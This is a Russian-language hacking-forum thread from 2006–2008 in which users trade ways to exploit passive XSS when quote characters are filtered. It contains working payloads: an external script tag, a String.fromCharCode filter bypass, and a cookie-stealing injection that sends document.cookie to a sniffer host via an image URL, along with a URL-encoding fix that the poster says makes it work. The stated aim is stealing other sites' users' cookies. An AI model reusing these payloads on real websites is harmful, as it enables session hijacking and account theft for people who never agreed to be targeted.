Как можно произвести xss, если фильтруются кавычки?

Обсуждение в разделе «Уязвимости», начал(-а) 1ten0.0net1, 20.04.2006.

  1. 1ten0.0net1

    1ten0.0net1 Time out

    Регистрация:
    28.11.2005
    Сообщения:
    485
    Одобрения:
    330
    Репутация:
    267
    Скажите - как можно произвести xss, если фильтруются кавычки? Вариант с заменой на одинарные, %22 и на &/#22; , а также перенаправление на мой java-скрипт не предлагать. На серваке magic_quotes=on.
     
    #1 1ten0.0net1, 20.04.2006
    В последний раз редактировалось: 20.04.2006
    Это одобряют 2 пользоветелей.
  2. drmist

    drmist New Member

    Регистрация:
    8.10.2005
    Сообщения:
    318
    Одобрения:
    94
    Репутация:
    61
    Одинарный ковычки тоже фильтруютя?
     
  3. Azazel

    Azazel Заведующий всем

    Регистрация:
    17.04.2005
    Сообщения:
    932
    Одобрения:
    213
    Репутация:
    135
    Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

    А во вторых попробуй использовать String.fromCharCode
    (encoder http://www.paulschou.com/tools/xlate/)
     
  4. K[o]S

    K[o]S New Member

    Регистрация:
    29.07.2005
    Сообщения:
    17
    Одобрения:
    5
    Репутация:
    4
    Ковычки могут понадобиться для того чтоб закрыть тег =)

    Автор поясни какого типа XSS актив пасив мыло форум и т.д
     
  5. 1ten0.0net1

    1ten0.0net1 Time out

    Регистрация:
    28.11.2005
    Сообщения:
    485
    Одобрения:
    330
    Репутация:
    267
    Вариант со внедрением ява-скрипта не подходит, как я и написал выше.
    Инъекция пассивная, одинарные фильтруются. Нужно внедрить адрес снифера. То, что знаю я - осуществляется через кавычки, поэтому прошу совета.
     
  6. Xex

    Xex Banned

    Регистрация:
    10.07.2005
    Сообщения:
    120
    Одобрения:
    41
    Репутация:
    17
    а просто тыги можешь использовать?...
    ну например картинку вставить?...
    HTML:
    <img src="тут твой код или адрес снифера">
    а далее можешь проверить:
    HTML:
    <script>alert(document.images[0].src)</script>
    Как дальше использовать думаю разберешься...
     
    Это одобряет 1 пользователь.
  7. Laggi

    Laggi Elder - Старейшина

    Регистрация:
    19.08.2005
    Сообщения:
    43
    Одобрения:
    1
    Репутация:
    0
    Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :)
    Т.е. просто картинку вставить могу - там кавычки не нужны, а вот с запросом О_о...
     
  8. Laggi

    Laggi Elder - Старейшина

    Регистрация:
    19.08.2005
    Сообщения:
    43
    Одобрения:
    1
    Репутация:
    0
    r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src%20=%20document.images[19].src+document.cookie;</script>
    К примеру не подходит
     
  9. Laggi

    Laggi Elder - Старейшина

    Регистрация:
    19.08.2005
    Сообщения:
    43
    Одобрения:
    1
    Репутация:
    0
    А, все, доперло - "+" = " "... как от этого избавиться? :) & нельзя использовать, сразу говорю.

    В виде "%ХХ" как "+" выглядит?

    UPD: усе, спасибо, нашел :) %2B - все работает
     
    #9 Laggi, 21.04.2006
    В последний раз редактировалось: 21.04.2006
  10. Del

    Del New Member

    Регистрация:
    24.01.2005
    Сообщения:
    6
    Одобрения:
    0
    Репутация:
    0
    так как запрос без кавычек выглядит?
     
  11. PaLb14

    PaLb14 New Member

    Регистрация:
    29.02.2008
    Сообщения:
    26
    Одобрения:
    6
    Репутация:
    0
    Дак как все таки обойти, если мне нужно закрыть тэг а кавычку съедает?
     
  12. Bonnie and Clyde

    Bonnie and Clyde New Member

    Регистрация:
    26.07.2008
    Сообщения:
    14
    Одобрения:
    4
    Репутация:
    2
    вообщето тег закрывается без кавычки т.е. <тег>бла-бла</тег> возможно при ксс использовать OnMouseOver=xxx; BodyOnLoad=; etc...... учи html и JavaScript
     
  13. PaLb14

    PaLb14 New Member

    Регистрация:
    29.02.2008
    Сообщения:
    26
    Одобрения:
    6
    Репутация:
    0
    Есть сайт в поиск ввожу <script>alert()</script> он все ставит в кавычки
    "<script>alert()</script>" меняю запрос на "><script>alert()</script> кавычка фильтруется на "&quot;"
     
  14. Don1=2

    Don1=2 New Member

    Регистрация:
    10.09.2007
    Сообщения:
    55
    Одобрения:
    51
    Репутация:
    11
    тогда с чего ты решил что там вообще есть ксс?
     
  15. PaLb14

    PaLb14 New Member

    Регистрация:
    29.02.2008
    Сообщения:
    26
    Одобрения:
    6
    Репутация:
    0
    Дак вот я и спрашиваю может есть какой то обход этой фильтрации!?
     
Загрузка...
Похожие темы
  1. Ответы:
    5
    Просмотры:
    900
  2. Ответы:
    4
    Просмотры:
    1 669
  3. Ответы:
    2
    Просмотры:
    1 586
  4. Ответы:
    9
    Просмотры:
    2 771
  5. Ответы:
    27
    Просмотры:
    3 456
  6. Ответы:
    8
    Просмотры:
    3 332
  7. Ответы:
    0
    Просмотры:
    1 009